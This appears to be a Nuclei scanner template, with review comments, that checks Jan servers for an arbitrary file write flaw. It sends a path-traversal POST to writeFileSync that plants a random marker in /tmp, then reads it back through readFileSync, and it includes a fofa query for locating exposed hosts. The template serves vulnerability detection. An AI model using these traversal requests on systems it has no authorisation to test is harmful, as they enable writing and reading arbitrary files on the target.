# Nuclei template (YAML): two-request check for the Jan file-write issue named
# in info.description. The first request writes a random marker through a
# traversal path, the second reads that path back, and the matchers look for
# the marker in the second response.
# NOTE(review): the `# digest:` trailer at the end signs the template text, so
# any edit to this file — these comments included — invalidates it until the
# template is re-signed.
id: jan-file-upload

info:
  name: Jan - Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
  metadata:
    fofa-query: icon_hash="-165268926"
    # matches the two raw requests below: one write, one read
    max-request: 2
  # intrusive: the first request creates a file on the target (under /tmp,
  # going by the traversal path in the request body) and nothing in this
  # template removes it afterwards
  tags: jan,intrusive,file-upload

variables:
  # 5-character lowercase random suffix for the marker file name, so repeated
  # runs do not reuse the same path
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      # Request 1: write the random marker {{randstr}} to the traversal path.
      # The `contentType: application/json` line is sent as a literal header
      # alongside the real Content-Type — presumably a leftover from the
      # original PoC; kept as-is so the request stays byte-identical.
      - |
        POST /v1/app/writeFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["/../../../../../tmp/{{string}}.txt","{{randstr}}"]

      # Request 2: read the same path back so the response body should carry
      # the marker written by request 1
      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["file:/../../../../../tmp/{{string}}.txt","utf-8"]

    # both matchers must hit: the marker has to appear in the body of the
    # second response (body_2) and the status has to be 200 (the status
    # matcher names no part, so which response it checks follows nuclei's
    # default — presumably the last one; confirm against the engine version)
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950